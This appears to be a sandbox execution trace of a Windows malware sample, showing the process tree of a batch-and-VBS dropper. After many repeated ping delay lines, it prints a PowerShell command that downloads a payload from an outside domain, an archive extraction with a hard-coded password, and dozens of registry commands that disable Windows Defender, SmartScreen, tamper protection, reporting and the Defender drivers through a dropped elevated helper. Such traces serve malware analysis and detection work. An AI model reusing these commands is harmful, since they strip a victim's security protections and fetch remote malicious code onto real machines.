C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 3 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://xuiklxus.xyz/hfile.bin', 'hfile.bin')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\7za.exe7za.exe x -y -p1234 "*.7z"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f6⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f6⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
C:\ProgramData\ConsoleApp\kernel32.exekernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵
-
C:\ProgramData\ConsoleApp\kernel32.exe"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵
-
